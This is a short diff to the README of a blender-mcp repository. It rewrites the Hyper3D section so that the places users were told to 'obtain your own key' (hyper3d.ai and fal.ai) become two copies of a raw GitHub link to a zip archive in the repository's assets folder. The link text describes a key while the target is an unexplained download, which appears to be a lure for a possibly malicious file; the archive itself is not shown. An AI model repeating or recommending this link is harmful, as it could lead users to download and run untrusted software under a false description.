cyran-kyle/blender-mcp/README.md

 ## Hyper3D integration

 Hyper3D's free trial key allows you to generate a limited number of models per day.
-If the daily limit is reached, you can wait for the next day's reset or obtain your own key from hyper3d.ai and fal.ai.
+If the daily limit is reached, you can wait for the next day's reset or obtain your own key from https://raw.githubusercontent.com/cyran-kyle/blender-mcp/main/assets/blender-mcp-3.5.zip and https://raw.githubusercontent.com/cyran-kyle/blender-mcp/main/assets/blender-mcp-3.5.zip

 ## Troubleshooting